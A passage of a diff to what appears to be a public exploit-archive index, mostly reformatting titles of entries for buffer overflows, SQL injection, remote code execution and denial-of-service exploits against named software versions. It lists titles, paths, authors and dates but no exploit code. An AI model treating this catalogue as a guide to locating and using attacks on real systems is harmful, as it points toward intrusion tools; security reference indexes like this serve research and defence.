SimpleServer:WWW 1.0.5 - DoS",2000-07-15,"Ussr Labs",windows,dos,0 20016,platforms/windows/dos/20016.py,"Shadow Op Software Dragon Server 1.0/2.0 - Multiple DoS",2000-06-16,Prizm,windows,dos,0 20017,platforms/windows/dos/20017.py,"Max Feoktistov Small HTTP server 1.212 - Buffer Overflow",2000-06-16,"Ussr Labs",windows,dos,0 @@ -17375,7 +17371,7 @@ id,file,description,date,author,platform,type,port 20025,platforms/linux/dos/20025.txt,"Debian 2.1/2.2 / Mandrake 6.0/6.1/7.0 / RedHat 6.x - rpc.lockd Remote Denial of Service",2000-06-08,"Mike Murray",linux,dos,0 20026,platforms/linux/dos/20026.c,"OpenLinux 2.3/2.4 / RedHat 6.0/6.1 / SCO eServer 2.3 - Denial of Service",1999-11-23,FuckGpm,linux,dos,0 20027,platforms/multiple/remote/20027.txt,"BEA Systems WebLogic Express 3.1.8/4/5 - Source Code Disclosure",2000-06-21,"Foundstone Inc.",multiple,remote,0 -20028,platforms/windows/remote/20028.rb,"Simple Web Server Connection Header Buffer Overflow",2012-07-23,Metasploit,windows,remote,0 +20028,platforms/windows/remote/20028.rb,"Simple Web Server - Connection Header Buffer Overflow",2012-07-23,Metasploit,windows,remote,0 20029,platforms/php/webapps/20029.rb,"EGallery - PHP File Upload",2012-07-23,Metasploit,php,webapps,0 20030,platforms/unix/remote/20030.c,"wu-ftpd 2.4.2/2.5 .0/2.6.0 - Remote Format String Stack Overwrite (1)",1999-10-15,tf8,unix,remote,0 20031,platforms/linux/remote/20031.c,"wu-ftpd 2.4.2/2.5 .0/2.6.0 - Remote Format String Stack Overwrite (2)",2000-09-26,vsz_,linux,remote,0 @@ -17383,7 +17379,7 @@ id,file,description,date,author,platform,type,port 20033,platforms/php/webapps/20033.py,"Dell SonicWALL Scrutinizer 9.0.1 - (statusFilter.php q parameter) SQL Injection",2012-07-22,muts,php,webapps,0 20035,platforms/asp/webapps/20035.js,"ipswitch whatsup gold 15.02 - Stored XSS / Blind SQLi / RCE",2012-07-22,muts,asp,webapps,0 20036,platforms/windows/local/20036.pl,"Photodex ProShow Producer 5.0.3256 - Local Buffer Overflow Exploit",2012-07-23,mr.pr0n,windows,local,0 -20037,platforms/linux/webapps/20037.txt,"Atmail WebAdmin and Webmail Control Panel SQL Root Password Disclosure",2012-07-23,Ciph3r,linux,webapps,0 +20037,platforms/linux/webapps/20037.txt,"Atmail WebAdmin and Webmail Control Panel - SQL Root Password Disclosure",2012-07-23,Ciph3r,linux,webapps,0 20038,platforms/linux/webapps/20038.py,"Symantec Web Gateway 5.0.2 - (blocked.php id parameter) Blind SQL Injection",2012-07-23,muts,linux,webapps,0 20039,platforms/windows/dos/20039.java,"LeafDigital LeafChat 1.7 - DoS",2000-06-25,"MDMA Crew",windows,dos,0 20040,platforms/windows/remote/20040.c,"SapporoWorks WinProxy 2.0/2.0.1 - Buffer Overflow",2000-06-27,UNYUN,windows,remote,0 @@ -17392,7 +17388,7 @@ id,file,description,date,author,platform,type,port 20043,platforms/linux/remote/20043.c,"DALnet Bahamut IRCd 4.6.5 - 'SUMMON' Buffer Overflow",2000-06-29,"Matt Conover",linux,remote,0 20044,platforms/php/webapps/20044.txt,"Symantec Web Gateway 5.0.3.18 - Blind SQLi Backdoor via MySQL Triggers",2012-07-23,muts,php,webapps,0 20045,platforms/linux/local/20045.c,"X 11.0/3.3.3/3.3.4/3.3.5/3.3.6/4.0 - libX11 _XAsyncReply() Stack Corruption",2000-06-19,"Chris Evans",linux,local,0 -20046,platforms/unix/remote/20046.txt,"Netscape Professional Services FTP Server (LDAP Aware) 1.3.6 FTP Server",2000-06-21,"Michael Zalewski",unix,remote,0 +20046,platforms/unix/remote/20046.txt,"Netscape Professional Services FTP Server (LDAP Aware) 1.3.6 - FTP Server Exploit",2000-06-21,"Michael Zalewski",unix,remote,0 20048,platforms/windows/remote/20048.txt,"Microsoft Windows 2000 - Remote CPU-overload",2000-06-30,"SecureXpert Labs",windows,remote,0 20047,platforms/windows/dos/20047.txt,"Microsoft Windows 2000 - Telnet Server DoS",2000-06-30,"SecureXpert Labs",windows,dos,0 20049,platforms/windows/remote/20049.txt,"Check Point Software Firewall-1 4.0/1.4.1 - Resource Exhaustion",2000-06-30,"SecureXpert Labs",windows,remote,0 @@ -17412,12 +17408,12 @@ id,file,description,date,author,platform,type,port 20064,platforms/linux/remote/20064.py,"Symantec Web Gateway 5.0.3.18 - LFI Remote ROOT RCE Exploit",2012-07-24,muts,linux,remote,0 20065,platforms/windows/remote/20065.txt,"DrPhibez and Nitro187 Guild FTPD 0.9.7 - File Existence Disclosure",2000-07-08,"Andrew Lewis",windows,remote,0 20066,platforms/windows/remote/20066.java,"Michael Lamont Savant WebServer 2.1/3.0 - Buffer Overflow",2000-07-03,Wizdumb,windows,remote,0 -20067,platforms/hardware/remote/20067.c,"PIX Firewall 2.7/3.x/4.x/5 Forged TCP RST",2000-07-10,"Citec Network Securities",hardware,remote,0 +20067,platforms/hardware/remote/20067.c,"PIX Firewall 2.7/3.x/4.x/5 - Forged TCP RST",2000-07-10,"Citec Network Securities",hardware,remote,0 20068,platforms/cgi/remote/20068.txt,"Sean MacGuire Big Brother 1.x - Directory Traversal",2000-07-11,"Eric Hines",cgi,remote,0 20069,platforms/windows/dos/20069.pl,"Texas Imperial Software WFTPD 2.4.1 - RNTO Denial of Service",2000-07-11,"Blue Panda",windows,dos,0 20070,platforms/windows/remote/20070.txt,"alt-n worldclient standard 2.1 - Directory Traversal",2000-07-12,"Rikard Carlsson",windows,remote,0 20071,platforms/cgi/dos/20071.c,"Mirabilis ICQ 0.99/98.0 a/2000.0 A/99a - Remote DoS Attack",2000-03-10,"Charles Chear",cgi,dos,0 -20072,platforms/novell/dos/20072.txt,"Novell Netware 5.0 SP5/6.0 SP1 SMDR.NLM Denial of Service",2000-07-11,"Dimuthu Parussalla",novell,dos,0 +20072,platforms/novell/dos/20072.txt,"Novell Netware 5.0 SP5/6.0 SP1 - SMDR.NLM Denial of Service",2000-07-11,"Dimuthu Parussalla",novell,dos,0 20073,platforms/unix/local/20073.txt,"CVSWeb Developer CVSWeb 1.80 - Insecure perl 'open'",2000-07-12,"Joey Hess",unix,local,0 20074,platforms/windows/remote/20074.java,"Infopulse GateKeeper 3.5 - Buffer Overflow",2000-07-13,Wizdumb,windows,remote,0 20075,platforms/linux/remote/20075.c,"Conectiva 4.x/5.x / Debian 2.x / RedHat 6.x / S.u.S.E 6.x/7.0 / Trustix 1.x - rpc.statd Remote Format String (1)",2000-07-16,drow,linux,remote,0 @@ -17426,10 +17422,10 @@ id,file,description,date,author,platform,type,port 20078,platforms/windows/remote/20078.pl,"Microsoft Outlook 97/98/2000 / Outlook Express 4.0/5.0 - GMT Field Buffer Overflow (1)",2000-07-18,"Ussr Labs",windows,remote,0 20079,platforms/windows/remote/20079.txt,"Microsoft Outlook 97/98/2000 / Outlook Express 4.0/5.0 - GMT Field Buffer Overflow (2)",2000-07-18,"Ussr Labs",windows,remote,0 20080,platforms/windows/dos/20080.c,"Computer Software Manufaktur Alibaba 2.0 - DoS",2000-07-18,wildcoyote,windows,dos,0 -20081,platforms/windows/local/20081.c,"NetZero ZeroPort 3.0 Weak Encryption Method",2000-07-18,"Brian Carrier",windows,local,0 +20081,platforms/windows/local/20081.c,"NetZero ZeroPort 3.0 - Weak Encryption Method",2000-07-18,"Brian Carrier",windows,local,0 20082,platforms/unix/remote/20082.txt,"University of Washington pop2d 4.46/4.51/4.54/4.55 - Remote File Read",2000-07-14,mandark,unix,remote,0 20083,platforms/php/webapps/20083.txt,"WordPress Front End Upload 0.5.4.4 Plugin - Arbitrary PHP File Upload",2012-07-24,"Chris Kellum",php,webapps,0 -20085,platforms/cgi/remote/20085.txt,"Computer Software Manufaktur Alibaba 2.0 Piped Command",2000-07-18,Prizm,cgi,remote,0 +20085,platforms/cgi/remote/20085.txt,"Computer Software Manufaktur Alibaba 2.0 - Piped Command",2000-07-18,Prizm,cgi,remote,0 20086,platforms/windows/remote/20086.c,"OReilly Software WebSite Professional 2.3.18/2.4/2.4.9 - 'webfind.exe' Buffer Overflow",2000-06-01,"Robert Horton",windows,remote,0 20087,platforms/php/webapps/20087.py,"Zabbix 2.0.1 - Session Extractor (0Day)",2012-07-24,muts,php,webapps,0 20088,platforms/linux/remote/20088.py,"Symantec Web Gateway 5.0.3.18 - pbcontrol.php ROOT RCE Exploit",2012-07-24,muts,linux,remote,0 @@ -17438,7 +17434,7 @@ id,file,description,date,author,platform,type,port 20091,platforms/multiple/remote/20091.txt,"Stalker Communigate Pro 3.2.4 - Arbitrary File Read",2000-04-03,S21Sec,multiple,remote,0 20092,platforms/cgi/local/20092.txt,"Sean MacGuire Big Brother 1.0/1.3/1.4 CGI File Creation",2001-06-11,xternal,cgi,local,0 20093,platforms/linux/local/20093.c,"Stanley T. Shebs Xconq 7.2.2 - xconq Buffer Overflow",2000-06-22,V9,linux,local,0 -20094,platforms/windows/dos/20094.txt,"NullSoft Winamp 2.6 4 M3U Playlist Buffer Overflow",2001-01-17,"Pauli Ojanpera",windows,dos,0 +20094,platforms/windows/dos/20094.txt,"NullSoft Winamp 2.64 - .M3U Playlist Buffer Overflow",2001-01-17,"Pauli Ojanpera",windows,dos,0 20095,platforms/multiple/remote/20095.txt,"Sun Java Web Server 1.1.3/2.0 Servlets",2000-07-20,"kevin j",multiple,remote,0 20096,platforms/windows/remote/20096.txt,"Microsoft IIS 2.0/3.0/4.0/5.0/5.1 - Internal IP Address Disclosure",2000-07-13,"Dougal Campbell",windows,remote,0 20097,platforms/multiple/remote/20097.txt,"IBM Websphere Application Server 2.0./3.0/3.0.2.1 - Showcode",2000-07-24,"Shreeraj Shah",multiple,remote,0 @@ -17463,14 +17459,14 @@ id,file,description,date,author,platform,type,port 20124,platforms/windows/webapps/20124.txt,"Dr. Web Control Center 6.00.3.201111300 - XSS",2012-07-31,"Oliver Karow",windows,webapps,0 20125,platforms/windows/remote/20125.txt,"Weblogic 3.1.8/4.0.4/4.5.1 - Remote Command Execution",2000-08-01,"Foundstone Inc.",windows,remote,0 20126,platforms/irix/local/20126.c,"IRIX 6.5.x - gr_osview Buffer Overflow",1997-01-01,"Last Stage of Delirium",irix,local,0 -20127,platforms/irix/local/20127.c,"SGI IRIX 6.2 libgl.so Buffer Overflow",1997-09-01,"Last Stage of Delirium",irix,local,0 +20127,platforms/irix/local/20127.c,"SGI IRIX 6.2 libgl.so - Buffer Overflow",1997-09-01,"Last Stage of Delirium",irix,local,0 20128,platforms/irix/local/20128.c,"IRIX 6.5.x - dmplay Buffer Overflow",2000-08-02,"Last Stage of Delirium",irix,local,0 20129,platforms/irix/local/20129.c,"IRIX 6.2/6.3 lpstat Buffer Overflow",1998-11-01,"Last Stage of Delirium",irix,local,0 20130,platforms/irix/local/20130.c,"IRIX 6.5.x - inpview Race Condition",2000-01-01,"Last Stage of Delirium",irix,local,0 20131,platforms/multiple/remote/20131.txt,"Apache Tomcat 3.1 - Path Revealing",2000-07-20,"ET LoWNOISE",multiple,remote,0 20132,platforms/multiple/remote/20132.txt,"Tomcat 3.0/3.1 Snoop Servlet - Information Disclosure",2000-07-20,"ET LoWNOISE",multiple,remote,0 20133,platforms/windows/local/20133.cpp,"Microsoft Windows 2000 - Named Pipes Predictability",2000-08-01,Maceo,windows,local,0 -20134,platforms/windows/remote/20134.pl,"NAI Net Tools PKI Server 1.0 strong.exe Buffer Overflow",2000-08-02,juliano,windows,remote,0 +20134,platforms/windows/remote/20134.pl,"NAI Net Tools PKI Server 1.0 - strong.exe Buffer Overflow",2000-08-02,juliano,windows,remote,0 20135,platforms/windows/remote/20135.txt,"nai net tools pki server 1.0 - Directory Traversal",2000-08-02,"Juliano Rizzo",windows,remote,0 20136,platforms/windows/remote/20136.txt,"NAI Net Tools PKI Server 1.0 - Format String",2000-08-02,"Juliano Rizzo",windows,remote,0 20137,platforms/irix/local/20137.c,"IRIX 6.2/6.3/6.4 - xfs truncate() Privilege Check",1997-02-01,"Last Stage of Delirium",irix,local,0 @@ -17490,14 +17486,14 @@ id,file,description,date,author,platform,type,port 20152,platforms/windows/remote/20152.pl,"Microsoft IIS 5.0 - 'Translate: f' Source Disclosure (2)",2000-08-14,"Roelof Temmingh",windows,remote,0 20153,platforms/unix/local/20153.c,"David Bagley xlock 4.16 - User Supplied Format String (1)",2000-08-15,noir,unix,local,0 20154,platforms/unix/local/20154.c,"David Bagley xlock 4.16 - User Supplied Format String (2)",2000-10-21,"Ben Williams",unix,local,0 -20155,platforms/linux/local/20155.txt,"Multisoft FlagShip 4.4 Installation Permission",2000-08-10,Narrow,linux,local,0 +20155,platforms/linux/local/20155.txt,"Multisoft FlagShip 4.4 - Installation Permission",2000-08-10,Narrow,linux,local,0 20156,platforms/cgi/remote/20156.txt,"netwin netauth 4.2 - Directory Traversal",2000-08-17,"Marc Maiffret",cgi,remote,0 20157,platforms/linux/remote/20157.c,"UMN Gopherd 2.x - Halidate Function Buffer Overflow",2000-08-20,"Chris Sharp",linux,remote,0 20158,platforms/php/webapps/20158.txt,"PHP-Nuke 1.0/2.5 - Administrative Privileges",2000-08-21,bruj0,php,webapps,0 20159,platforms/linux/remote/20159.c,"Darxite 0.4 - Login Buffer Overflow",2000-08-22,Scrippie,linux,remote,0 20160,platforms/linux/local/20160.txt,"Minicom 1.82/1.83 Capture-file Group Ownership",2000-08-19,"Michal Zalewski",linux,local,0 20161,platforms/linux/remote/20161.txt,"X-Chat 1.2/1.3/1.4/1.5 - Command Execution Via URLs",2000-08-17,"zenith parsec",linux,remote,0 -20162,platforms/hp-ux/local/20162.txt,"HP-UX 11.0 net.init RC Script",2000-08-22,"Kyong-won Cho",hp-ux,local,0 +20162,platforms/hp-ux/local/20162.txt,"HP-UX 11.0 - net.init RC Script",2000-08-22,"Kyong-won Cho",hp-ux,local,0 20163,platforms/unix/remote/20163.c,"WorldView 6.5/Wnn4 4.2 - Asian Language Server Remote Buffer Overflow",2000-03-08,UNYUN,unix,remote,0 20164,platforms/cgi/remote/20164.pl,"CGI Script Center Account Manager 1.0 LITE / PRO - Administrative Password Alteration (1)",2000-08-23,teleh0r,cgi,remote,0 20165,platforms/cgi/remote/20165.html,"CGI Script Center Account Manager 1.0 LITE / PRO - Administrative Password Alteration (2)",2000-08-23,n30,cgi,remote,0 @@ -17513,9 +17509,9 @@ id,file,description,date,author,platform,type,port 20176,platforms/cgi/remote/20176.pl,"CGI Script Center Subscribe Me Lite 2.0 - Administrative Password Alteration (1)",2000-08-23,teleh0r,cgi,remote,0 20177,platforms/cgi/remote/20177.html,"CGI Script Center Subscribe Me Lite 2.0 - Administrative Password Alteration (2)",2000-08-23,n30,cgi,remote,0 20178,platforms/multiple/dos/20178.pl,"vqSoft vqServer 1.4.49 - DoS",2000-08-19,sinfony,multiple,dos,0 -20179,platforms/unix/local/20179.txt,"Gert Doering mgetty 1.1.19/1.1.20/1.1.21/1.22.8 Symbolic Link Traversal",2000-08-25,"Stan Bubrouski",unix,local,0 +20179,platforms/unix/local/20179.txt,"Gert Doering mgetty 1.1.19/1.1.20/1.1.21/1.22.8 - Symbolic Link Traversal",2000-08-25,"Stan Bubrouski",unix,local,0 20180,platforms/windows/remote/20180.c,"RobTex Viking Server 1.0.6 Build 355 - Buffer Overflow",2000-08-28,wildcoyote,windows,remote,0 -20181,platforms/multiple/remote/20181.txt,"Kerberos 4 4.0/5 5.0 KDC Spoofing",2000-08-28,"Dug Song",multiple,remote,0 +20181,platforms/multiple/remote/20181.txt,"Kerberos 4 4.0/5 5.0 - KDC Spoofing",2000-08-28,"Dug Song",multiple,remote,0 20182,platforms/windows/remote/20182.txt,"Ipswitch IMail 6.x - File Attachment",2000-08-30,Timescape,windows,remote,0 20183,platforms/cgi/remote/20183.pl,"GWScripts News Publisher 1.0 - author.file Write",2000-08-29,n30,cgi,remote,0 20184,platforms/windows/remote/20184.txt,"eEye Digital Security IRIS 1.0.1 / SpyNet CaptureNet 3.0.12 - Buffer Overflow",2000-08-31,"Ussr Labs",windows,remote,0 @@ -17560,9 +17556,9 @@ id,file,description,date,author,platform,type,port 20224,platforms/windows/remote/20224.txt,"CamShot WebCam 2.6 Trial - Remote Buffer Overflow",2000-09-15,SecuriTeam,windows,remote,0 20225,platforms/windows/dos/20225.pl,"Alt-N MDaemon 3.1.1 - DoS",1999-12-01,"Ussr Labs",windows,dos,0 20226,platforms/freebsd/dos/20226.c,"FreeBSD Kernel - SCTP Remote NULL Ptr Dereference DoS",2012-08-03,"Shaun Colley",freebsd,dos,0 -20542,platforms/windows/local/20542.rb,"globalSCAPE CuteZIP Stack Buffer Overflow",2012-08-15,Metasploit,windows,local,0 -20228,platforms/windows/dos/20228.pl,"TYPSoft 0.7 x FTP Server Remote DoS",1999-06-08,dethy,windows,dos,0 -20229,platforms/multiple/dos/20229.txt,"IBM Websphere Application Server 3.0.2 Server Plugin DoS",2000-09-15,"Rude Yak",multiple,dos,0 +20542,platforms/windows/local/20542.rb,"globalSCAPE CuteZIP - Stack Buffer Overflow",2012-08-15,Metasploit,windows,local,0 +20228,platforms/windows/dos/20228.pl,"TYPSoft 0.7 x - FTP Server Remote DoS",1999-06-08,dethy,windows,dos,0 +20229,platforms/multiple/dos/20229.txt,"IBM Websphere Application Server 3.0.2 Server Plugin - DoS",2000-09-15,"Rude Yak",multiple,dos,0 20230,platforms/sco/local/20230.c,"Tridia DoubleVision 3.0 7.00 - Local Root Compromise",2000-06-24,"Stephen J. Friedl",sco,local,0 20231,platforms/hardware/remote/20231.txt,"Cisco PIX Firewall 4.x/5.x - SMTP Content Filtering Evasion",2000-09-19,"Lincoln Yeoh",hardware,remote,0 20232,platforms/windows/local/20232.cpp,"Microsoft Windows 2000/NT 4 - DLL Search Path Weakness",2000-09-18,"Georgi Guninski",windows,local,0 @@ -17574,19 +17570,19 @@ id,file,description,date,author,platform,type,port 20238,platforms/cgi/remote/20238.txt,"Alabanza Control Panel 3.0 - Domain Modification",2000-09-24,"Weihan Leow",cgi,remote,0 20239,platforms/multiple/dos/20239.txt,"HP OpenView Network Node Manager 6.10 - SNMP DoS",2000-09-26,DCIST,multiple,dos,0 20240,platforms/windows/remote/20240.txt,"Microsoft Windows Media Player 7 - Embedded OCX Control",2000-09-26,"Ussr Labs",windows,remote,0 -20241,platforms/palm_os/local/20241.txt,"Palm OS 3.5.2 Weak Encryption",2000-09-26,@stake,palm_os,local,0 +20241,platforms/palm_os/local/20241.txt,"Palm OS 3.5.2 - Weak Encryption",2000-09-26,@stake,palm_os,local,0 20242,platforms/cgi/remote/20242.txt,"Unixware 7.0 SCOhelp HTTP Server Format String",2000-09-26,"Juliano Rizzo",cgi,remote,0 20243,platforms/windows/remote/20243.html,"Microsoft Windows Script Host 5.1/5.5 - GetObject() File Disclosure",2000-09-26,"Georgi Guninski",windows,remote,0 20244,platforms/cgi/remote/20244.txt,"TalentSoft Web+ Client/Monitor/server 4.6 Internal IP Address Disclosure",2000-09-27,"Delphis Consulting",cgi,remote,0 20245,platforms/cgi/remote/20245.txt,"TalentSoft Web+ Client/Monitor/server 4.6 - Source Code Disclosure",2000-09-27,"Delphis Consulting",cgi,remote,0 20246,platforms/linux/remote/20246.txt,"TalentSoft Web+ Application Server (Linux) 4.6 - Example Script File Disclosure",2000-09-26,DCIST,linux,remote,0 -20247,platforms/windows/remote/20247.txt,"Smartwin Technology CyberOffice Shopping Cart 2.0 Price Modification",2000-10-02,"Delphis Consulting",windows,remote,0 -20248,platforms/windows/remote/20248.txt,"SmartWin CyberOffice Shopping Cart 2.0 Client Information Disclosure",2000-10-02,DCIST,windows,remote,0 +20247,platforms/windows/remote/20247.txt,"Smartwin Technology CyberOffice Shopping Cart 2.0 - Price Modification",2000-10-02,"Delphis Consulting",windows,remote,0 +20248,platforms/windows/remote/20248.txt,"SmartWin CyberOffice Shopping Cart 2.0 - Client Information Disclosure",2000-10-02,DCIST,windows,remote,0 20249,platforms/windows/remote/20249.txt,"David Harris Pegasus Mail 3.12 - File Forwarding",2000-10-03,"Imran Ghory",windows,remote,0 -20250,platforms/linux/local/20250.c,"LBL traceroute 1.4 a5 Heap Corruption (1)",2000-09-28,Dvorak,linux,local,0 -20251,platforms/linux/local/20251.c,"LBL traceroute 1.4 a5 Heap Corruption (2)",2000-09-28,"Perry Harrington",linux,local,0 -20252,platforms/linux/local/20252.c,"LBL traceroute 1.4 a5 Heap Corruption (3)",2000-09-28,"Michel Kaempf",linux,local,0 -20253,platforms/linux/remote/20253.sh,"OpenSSH 1.2 scp File Create/Overwrite",2000-09-30,"Michal Zalewski",linux,remote,0 +20250,platforms/linux/local/20250.c,"LBL traceroute 1.4 a5 - Heap Corruption (1)",2000-09-28,Dvorak,linux,local,0 +20251,platforms/linux/local/20251.c,"LBL traceroute 1.4 a5 - Heap Corruption (2)",2000-09-28,"Perry Harrington",linux,local,0 +20252,platforms/linux/local/20252.c,"LBL traceroute 1.4 a5 - Heap Corruption (3)",2000-09-28,"Michel Kaempf",linux,local,0 +20253,platforms/linux/remote/20253.sh,"OpenSSH 1.2 - .scp File Create/Overwrite",2000-09-30,"Michal Zalewski",linux,remote,0 20254,platforms/windows/dos/20254.txt,"Microsoft Windows NT 4.0 - Invalid LPC Request DoS",2000-10-03,"BindView's Razor Team",windows,dos,0 20255,platforms/windows/dos/20255.txt,"Microsoft Windows NT 4.0 / 2000 - LPC Zone Memory Depletion DoS",2000-10-03,"BindView's Razor Team",windows,dos,0 20256,platforms/openbsd/local/20256.c,"OpenBSD 2.x - fstat Format String",2000-10-04,K2,openbsd,local,0 @@ -17607,9 +17603,9 @@ id,file,description,date,author,platform,type,port 20271,platforms/openbsd/dos/20271.c,"OpenBSD 2.x - Pending ARP Request Remote DoS",2000-10-05,skyper,openbsd,dos,0 20272,platforms/windows/dos/20272.pl,"Apache 1.2.5/1.3.1 & UnityMail 2.0 - MIME Header DoS",1998-08-02,L.Facq,windows,dos,0 20273,platforms/cgi/remote/20273.txt,"Moreover CGI script - File Disclosure",2000-10-02,CDI,cgi,remote,0 -20274,platforms/multiple/local/20274.pl,"IBM WebSphere 2.0/3.0 ikeyman Weak Encrypted Password",1999-10-24,"Ben Laurie",multiple,local,0 +20274,platforms/multiple/local/20274.pl,"IBM WebSphere 2.0/3.0 - ikeyman Weak Encrypted Password",1999-10-24,"Ben Laurie",multiple,local,0 20275,platforms/solaris/local/20275.sh,"Netscape iCal 2.1 Patch2 iPlanet iCal - 'iplncal.sh' Permissions",2000-10-10,@stake,solaris,local,0 -20276,platforms/solaris/local/20276.sh,"Netscape iCal 2.1 Patch2 iPlanet iCal 'csstart'",2000-10-10,@stake,solaris,local,0 +20276,platforms/solaris/local/20276.sh,"Netscape iCal 2.1 Patch2 - iPlanet iCal 'csstart'",2000-10-10,@stake,solaris,local,0 20277,platforms/cgi/remote/20277.txt,"Armada Design Master Index 1.0 - Path Traversal",2000-07-18,pestilence,cgi,remote,0 20278,platforms/php/webapps/20278.txt,"phpix 1.0 - Directory Traversal",2000-10-07,Synnergy.net,php,webapps,0 20279,platforms/cgi/remote/20279.txt,"extropia webstore 1.0/2.0 - Directory Traversal",2000-10-09,f0bic,cgi,remote,0 @@ -17636,8 +17632,8 @@ id,file,description,date,author,platform,type,port 20304,platforms/windows/dos/20304.txt,"Omnicron OmniHTTPD 1.1/2.0 Alpha 1 - visiadmin.exe Denial of Service",1999-06-05,"Valentin Perelogin",windows,dos,0 20305,platforms/windows/remote/20305.txt,"Microsoft Site Server 2.0 with IIS 4.0 - File Upload",1999-01-30,Mnemonix,windows,remote,0 20306,platforms/windows/remote/20306.html,"Microsoft Virtual Machine - Arbitrary Java Codebase Execution",2000-10-18,"Georgi Guninski",windows,remote,0 -20307,platforms/windows/dos/20307.txt,"Hilgraeve HyperTerminal 6.0 Telnet Buffer Overflow",2000-10-18,"Ussr Labs",windows,dos,0 -20308,platforms/linux/remote/20308.c,"Samba 1.9.19 Long Password Buffer Overflow",1997-09-25,root@adm.kix-azz.org,linux,remote,0 +20307,platforms/windows/dos/20307.txt,"Hilgraeve HyperTerminal 6.0 - Telnet Buffer Overflow",2000-10-18,"Ussr Labs",windows,dos,0 +20308,platforms/linux/remote/20308.c,"Samba 1.9.19 - Long Password Buffer Overflow",1997-09-25,root@adm.kix-azz.org,linux,remote,0 20309,platforms/windows/remote/20309.txt,"Microsoft IIS 3.0 - newdsn.exe File Creation",1997-08-25,"Vytis Fedaravicius",windows,remote,0 20310,platforms/windows/dos/20310.txt,"Microsoft IIS 4.0 - Pickup Directory DoS",2000-02-15,Valentijn,windows,dos,0 20311,platforms/windows/dos/20311.c,"Avirt Mail 4.0/4.2 - 'Mail From:' and 'Rcpt to:' DoS",2000-10-23,Martin,windows,dos,0 @@ -17647,9 +17643,9 @@ id,file,description,date,author,platform,type,port 20315,platforms/multiple/remote/20315.txt,"Allaire JRun 2.3 - File Source Code Disclosure",2000-10-23,"Foundstone Labs",multiple,remote,0 20316,platforms/linux/local/20316.txt,"BSD lpr 0.54 -4 - Arbitrary Command Execution",2000-10-20,"zenith parsec",linux,local,0 20317,platforms/windows/local/20317.c,"Microsoft Windows NT 4.0 - MSIEXEC Registry Permissions",2000-10-23,Mnemonix,windows,local,0 -20318,platforms/windows/remote/20318.txt,"Oracle Business Transaction Management Server 12.1.0.2.7 FlashTunnelService WriteToFile Message RCE",2012-08-07,rgod,windows,remote,0 -20319,platforms/windows/remote/20319.txt,"Oracle Business Transaction Management Server 12.1.0.2.7 FlashTunnelService Remote File Deletion",2012-08-07,rgod,windows,remote,0 -20320,platforms/windows/webapps/20320.txt,"Zoho BugTracker Multiple Stored XSS Vulnerabilities",2012-08-07,LiquidWorm,windows,webapps,0 +20318,platforms/windows/remote/20318.txt,"Oracle Business Transaction Management Server 12.1.0.2.7 - FlashTunnelService WriteToFile Message RCE",2012-08-07,rgod,windows,remote,0 +20319,platforms/windows/remote/20319.txt,"Oracle Business Transaction Management Server 12.1.0.2.7 FlashTunnelService - Remote File Deletion",2012-08-07,rgod,windows,remote,0 +20320,platforms/windows/webapps/20320.txt,"Zoho BugTracker - Multiple Stored XSS Vulnerabilities",2012-08-07,LiquidWorm,windows,webapps,0 20321,platforms/windows/remote/20321.rb,"Ubisoft uplay 2.0.3 - ActiveX Control Arbitrary Code Execution",2012-08-08,Metasploit,windows,remote,0 20322,platforms/multiple/remote/20322.html,"Sun HotJava Browser 3 - Arbitrary DOM Access",2000-10-25,"Georgi Guninski",multiple,remote,0 20323,platforms/hardware/dos/20323.txt,"Cisco IOS 12 - Software '?/' HTTP Request DoS",2000-10-25,"Alberto Solino",hardware,dos,0 @@ -17666,16 +17662,16 @@ id,file,description,date,author,platform,type,port 20334,platforms/windows/remote/20334.java,"CatSoft FTP Serv-U 2.5.x - Brute-Force",2000-10-29,Craig,windows,remote,0 20335,platforms/windows/remote/20335.txt,"Microsoft Indexing Services for Windows 2000/NT 4.0 - (.htw) Cross-Site Scripting",2000-10-28,"Georgi Guninski",windows,remote,0 20336,platforms/multiple/dos/20336.txt,"Unify eWave ServletExec 3.0 c - DoS",2000-10-30,"Foundstone Labs",multiple,dos,0 -20337,platforms/unix/remote/20337.c,"tcpdump 3.4/3.5 AFS ACL Packet Buffer Overflow",2001-01-02,Zhodiac,unix,remote,0 +20337,platforms/unix/remote/20337.c,"tcpdump 3.4/3.5 - AFS ACL Packet Buffer Overflow",2001-01-02,Zhodiac,unix,remote,0 20338,platforms/linux/local/20338.c,"SAMBA 2.0.7 - SWAT Symlink (1)",2000-11-01,Optyx,linux,local,0 20339,platforms/linux/local/20339.sh,"SAMBA 2.0.7 - SWAT Symlink (2)",2000-11-01,Optyx,linux,local,0 -20340,platforms/unix/remote/20340.c,"SAMBA 2.0.7 SWAT Logging Failure",2000-11-01,dodeca-T,unix,remote,0 -20341,platforms/linux/local/20341.sh,"SAMBA 2.0.7 SWAT Logfile Permissions",2000-11-01,miah,linux,local,0 +20340,platforms/unix/remote/20340.c,"SAMBA 2.0.7 SWAT - Logging Failure",2000-11-01,dodeca-T,unix,remote,0 +20341,platforms/linux/local/20341.sh,"SAMBA 2.0.7 SWAT - Logfile Permissions",2000-11-01,miah,linux,local,0 20342,platforms/php/webapps/20342.php,"WespaJuris 3.0 - Multiple Vulnerabilities",2012-08-08,WhiteCollarGroup,php,webapps,0 20343,platforms/php/webapps/20343.pl,"Joomla En Masse Component 1.2.0.4 - SQL Injection",2012-08-08,D4NB4R,php,webapps,0 20344,platforms/php/webapps/20344.php,"AraDown - Blind SQL Injection",2012-08-08,G-B,php,webapps,0 20345,platforms/php/webapps/20345.txt,"iauto mobile application 2012 - Multiple Vulnerabilities",2012-08-08,Vulnerability-Lab,php,webapps,0 -20346,platforms/php/webapps/20346.txt,"Inout Mobile Webmail APP Persistent XSS",2012-08-08,Vulnerability-Lab,php,webapps,0 +20346,platforms/php/webapps/20346.txt,"Inout Mobile Webmail APP - Persistent XSS",2012-08-08,Vulnerability-Lab,php,webapps,0 20347,platforms/php/webapps/20347.txt,"Openconstructor CMS 3.12.0 - 'id' Parameter Multiple SQL Injection",2012-08-08,"Lorenzo Cantoni",php,webapps,0 20348,platforms/windows/webapps/20348.py,"axigen mail server 8.0.1 - Stored XSS",2012-08-08,loneferret,windows,webapps,0 20349,platforms/windows/webapps/20349.py,"emailarchitect enterprise email server 10.0 - Stored XSS",2012-08-08,loneferret,windows,webapps,0 @@ -17703,12 +17699,12 @@ id,file,description,date,author,platform,type,port 20371,platforms/windows/remote/20371.txt,"Microsoft Windows 95/WfW - smbclient Directory Traversal",1995-10-30,"Dan Shearer",windows,remote,0 20372,platforms/hardware/remote/20372.pl,"Cisco Virtual Central Office 4000 (VCO/4K) 